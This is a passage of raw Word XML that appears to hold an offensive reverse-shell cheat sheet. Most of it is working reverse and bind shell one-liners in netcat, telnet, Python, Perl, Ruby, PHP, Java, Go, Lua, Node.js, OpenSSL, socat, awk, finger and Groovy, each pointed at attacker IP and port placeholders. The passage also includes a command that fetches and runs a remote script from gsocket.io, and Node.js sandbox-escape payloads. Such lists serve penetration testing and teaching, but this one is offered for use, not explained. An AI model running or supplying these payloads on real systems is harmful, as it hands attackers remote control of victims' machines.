          <w:rFonts w:ascii="var(--font-mono)" w:eastAsiaTheme="majorEastAsia" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>upgrade</w:t>
      </w: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 xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334741B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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E5736FB" w14:textId="0661E9FC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E508B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 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&lt;ATTACKER-IP&gt; &lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CEE1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&lt;ATTACKER-IP&gt; &lt;PORT&gt; | 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#Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495A68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rm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f;mkfifo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f;cat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/f|/bin/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2&gt;&amp;1|nc &lt;ATTACKER-IP&gt; &lt;PORT&gt; &gt;/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/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21F37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&lt;ATTACKER-IP&gt; &lt;PORT1&gt;| /bin/bash |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&lt;ATTACKER-IP&gt; &lt;PORT2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85EA1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rm -f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bkpipe;mknod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bkpipe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p;/bin/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0&lt;/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bkpipe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|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&lt;ATTACKER-IP&gt; &lt;PORT&gt; 1&gt;/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bkpipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2571F6E8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gsocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2019DC8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Check it in </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://www.gsocket.io/deploy/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B2CF983" w14:textId="1D67BE8D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76CD65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bash -c "$(curl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gsocket.io/x)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15682AA4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Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5838974A" w14:textId="6F022FE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E10D73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telnet &lt;ATTACKER-IP&gt; &lt;PORT&gt; | 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#Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C161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rm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f;mkfifo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f;cat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/f|/bin/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2&gt;&amp;1|telnet &lt;ATTACKER-IP&gt; &lt;PORT&gt; &gt;/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/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B885F6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telnet &lt;ATTACKER-IP&gt; &lt;PORT&gt; | /bin/bash | telnet &lt;ATTACKER-IP&gt; &lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C0AD3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rm -f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bkpipe;mknod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bkpipe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p;/bin/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0&lt;/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bkpipe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| telnet &lt;ATTACKER-IP&gt; &lt;PORT&gt; 1&gt;/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bkpipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FC2C730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Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E6067F5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Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03811506" w14:textId="5C1D560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1033C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while true; do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-l &lt;port&gt;;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done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A9E9C9A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To send the command write it down, press enter and press CTRL+D (to stop STDIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA94D7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Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CCE3A" w14:textId="7E29B28A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66063E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export X=Connected; while true; do X=`eval $(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whois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-h &lt;IP&gt; -p &lt;Port&gt; "Output: $X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")`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; sleep 1; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE59725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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E43470" w14:textId="1A6AB75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1BCB04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#Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2D2A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export RHOST="127.0.0.1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";export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RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for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in (0,1,2)];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pty.spawn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")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43193D0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python -c 'import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socket,subprocess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,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(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s.fileno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(),1); os.dup2(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s.fileno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(),2);p=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subprocess.call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(["/bin/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","-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"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47B52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#IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC563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python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(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s.fileno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(),1); os.dup2(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s.fileno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(),2);p=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pty.spawn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");' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83F0F7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Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C0191C" w14:textId="54007EF3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E9017C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perl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 'use Socket;$i="&lt;ATTACKER-IP&gt;";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh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");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDB1A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perl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-MIO -e '$p=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fork;exit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,if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($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5CEAE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Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96AFB9" w14:textId="1F63D37A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BDFFCC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ruby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rsocket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e'f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TCPSocket.open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("10.0.0.1",1234).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to_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i;exec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sprintf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&lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",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f,f,f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)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0934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ruby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rsocket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 'exit if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fork;c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=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print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io.read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}end'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4F5E8A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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EABA1D" w14:textId="5817ACC4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F2A62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// Using 'exec' is the most common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method, but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assumes that the file descriptor will be 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDDFCA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// Using this method may lead to instances where the connection reaches out to the listener and then closes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33015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php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-r '$sock=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fsockopen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"10.0.0.1",1234);exec("/bin/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&lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6480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2C733C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// Using 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proc_open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 makes no assumptions about what the file descriptor will be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B1CD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// See https://security.stackexchange.com/a/198944 for more information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DFDA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&lt;?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php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$sock=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fsockopen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"10.0.0.1",1234);$proc=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proc_open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",array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569048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28E06BF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&lt;?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php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exec(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"/bin/bash -c 'bash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/10.10.14.8/4444 0&gt;&amp;1'"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BAFC9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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B39AEC" w14:textId="3802866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C4B0E9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r =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Runtime.getRuntime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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267BECA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p =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r.exec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(["/bin/bash","-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c","exec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5&lt;&gt;/dev/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/ATTACKING-IP/80;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31CFA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p.waitFor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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F81A7A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Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="091C87E0" w14:textId="2531896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6954FC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victim&gt;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--exec cmd.exe --allow 10.0.0.4 -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vnl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4444 --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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49224FF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attacker&gt;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-v 10.0.0.22 4444 --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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4463C726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Golang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBCAA8" w14:textId="28337E0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4FA5E4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echo 'package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main;import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"os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/exec";import"net";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func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main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' &gt;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t.go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&amp;&amp; go run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t.go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&amp;&amp; rm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t.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1400B6EC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Lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A763460" w14:textId="68298A5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3C4535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#Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF06C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lua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 "require('socket'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);require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('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh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&lt;&amp;3 &gt;&amp;3 2&gt;&amp;3');"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474D58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#Windows &amp; Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71300A2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lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local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=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socket.tcp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() local io = require("io")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tcp:connect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(host, port); while true do local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, </w:t>
      </w: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 xml:space="preserve">status, partial =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tcp:receive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() local f =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io.popen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, 'r') local s = f:read("*a") f:close()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tcp:send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(s) if status == "closed" then break end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end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tcp:close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()'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B01AABE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NodeJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00268B" w14:textId="2FA93249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2D3957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function(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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A18B59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var net = require("net"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB3BC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cp = require("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child_process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"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130CD3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=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cp.spawn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", []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D3F8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var client = new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net.Socket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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAC64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client.connect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(8080, "10.17.26.64", function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855806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client.pipe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sh.stdin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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B33B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sh.stdout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.pipe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(client);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B484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sh.stderr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.pipe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(client);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0EA1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0E36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return /a/; // Prevents the Node.js application form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crashing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A817E4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})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D62DA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37A3359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B4ACED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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE262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7E39D53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require('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child_process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).exec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 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[IPADDR] [PORT]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6A52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require('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child_process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).exec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("bash -c 'bash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&gt;&amp;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/10.10.14.2/6767 0&gt;&amp;1'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E9DBB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3E9E2D6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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540BE6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2FD65F0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-var x =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global.process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.mainModule.require</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E08339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-x('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child_process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).exec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[IPADDR] [PORT] -e /bin/bash')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFC32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10DDA75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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268E8E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2DBCBAC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// If you get to the constructor of a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function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you can define and execute another function inside a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55D5E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".sub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.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC03E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"._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_proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F11A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46C5383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170A7C2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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084AE7A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3CA4A2B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// Abuse this syntax to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13032C2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var fs =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this.process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.binding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('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC1E70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var fs =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process.binding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('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8D1F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2B2C6D5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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A7BD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2A1CCE0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https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18B8DD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lastRenderedPageBreak/>
        <w:t>OpenSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578B35B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The Attacker (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02855EF6" w14:textId="1AA06B9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198BFF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req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-x509 -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newkey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rsa:4096 -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keyout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key.pem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-out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-days 365 -nodes #Generate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certificate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C09FE5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-key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key.pem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-cert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-port &lt;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l_port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&gt; #Here you will be able to introduce the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commands</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5670222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-key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key.pem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-cert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-port &lt;l_port2&gt; #Here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yo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will be able to get the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response</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26DA3F0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The Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFDC3D" w14:textId="5B441BA5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EA0BF9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#Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2DCD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-connect &lt;ATTACKER_IP&gt;:&lt;PORT1&gt;|/bin/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bash|openssl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-connect &lt;ATTACKER_IP&gt;:&lt;PORT2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554028C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19687AE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#Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58400DB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openssl.exe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-connect &lt;ATTACKER_IP&gt;:&lt;PORT1&gt;|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cmd.exe|openssl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-connect &lt;ATTACKER_IP&gt;:&lt;PORT2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B13DA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Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D155B07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12" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://github.com/andrew-d/static-binaries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7751E44C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 xml:space="preserve">Bind </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BB01FC3" w14:textId="2241D65D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EBF41E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victim&gt;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TCP-LISTEN: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1337,reuseaddr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,fork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EXEC:bash,pty,stderr,setsid,sigint,sane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A4FE80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attacker&gt;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FILE:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tty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`,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raw,echo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=0 TCP:&lt;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victim_ip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&gt;:1337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685155C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Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A912278" w14:textId="14DE3F6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CE42A5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attacker&gt;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TCP-LISTEN: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1337,reuseaddr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FILE:`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tty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`,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raw,echo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=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08390FC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victim&gt;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TCP4:&lt;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attackers_ip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&gt;:1337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EXEC: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bash,pty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,stderr,setsid,sigint,sane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="101F9D9D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Awk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE52B9" w14:textId="2357820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CE8500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awk 'BEGIN {s = "/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inet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/0/&lt;IP&gt;/&lt;PORT&gt;";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while(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42) { do{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printf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"shell&gt;" |&amp; s; s |&amp;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getline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c; if(c){ while ((c |&amp;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getline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 &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77523D88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Finger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F7E52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Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DE9A1" w14:textId="02D9F383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DA8972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 xml:space="preserve">while true; do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-l 79;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done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27BBD949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To send the command write it down, press enter and press CTRL+D (to stop STDIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B93BE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eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFD224" w14:textId="341893AE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11D7B2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export X=Connected; while true; do X=`eval $(finger "$X"@&lt;IP&gt; 2&gt; /dev/null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')`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; sleep 1; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330988D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FD3708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export X=Connected; while true; do X=`eval $(finger "$X"@&lt;IP&gt; 2&gt; /dev/null | grep '!'|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's/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^!/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/')`; sleep 1; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8FDAE2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Gawk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCD7A8" w14:textId="76C918B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77A33C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#!/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usr/bin/gawk -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46213AC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3D8A3D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BEGIN {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911FD6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Port    =       8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233BFF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Prompt  =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bkd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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06578B1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677FEBF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Service = "/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inet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/" Port "/0/0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318B365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while (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AFC35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do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E62C3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    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printf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Prompt |&amp; Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39F4C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        Service |&amp;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getline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</w:p>
    <w:p w14:paraId="6C70006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        if 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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC83A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                while ((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|&amp;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getline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 &gt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E2760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                        print $0 |&amp;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Service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21D7C44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                close(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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D911BA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        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDA86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} while (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!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 "exit")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9385F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   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close(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Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02870DE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D211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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B8F2D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Xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B90B30D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This will try to connect to your system at port 6001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931BD50" w14:textId="707E8E61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38536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xterm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-display 10.0.0.1:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE41F69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To catch the reverse </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can use (which will listen in port 6001):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95D132" w14:textId="3B18CCD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7871AA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Authorize host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2516F21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xhost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+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targetip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C52C36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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E205A0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Xnest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:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2BB81C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Groovy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42C8A9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by </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>frohoff</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOTE: Java reverse shell also work for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Groovy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F18E7F6" w14:textId="3EBBA45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987D02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String host="localhost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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A48ADA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int port=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8044;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="013A988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String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="cmd.exe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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FFABAC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Process p=new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ProcessBuilder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redirectErrorStream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(true).start();Socket s=new Socket(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host,port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InputStream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pi=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p.getInputStream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(),pe=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p.getErrorStream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(),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s.getInputStream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OutputStream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po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {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p.exitValue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();break;}catch (Exception e){}};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p.destroy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s.close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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD2E0F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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C9D64" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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14" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://highon.coffee/blog/reverse-shell-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="006EB1B1" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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15" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31A374CC" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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16" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66C47101" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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17" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="241C491E" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="35615BB0" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="790151A7" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="6C9214C3" w14:textId="77777777" w:rsidR="004816D2" w:rsidRPr="00827D6A" w:rsidRDefault="00000000" w:rsidP="004816D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hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="004816D2" w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
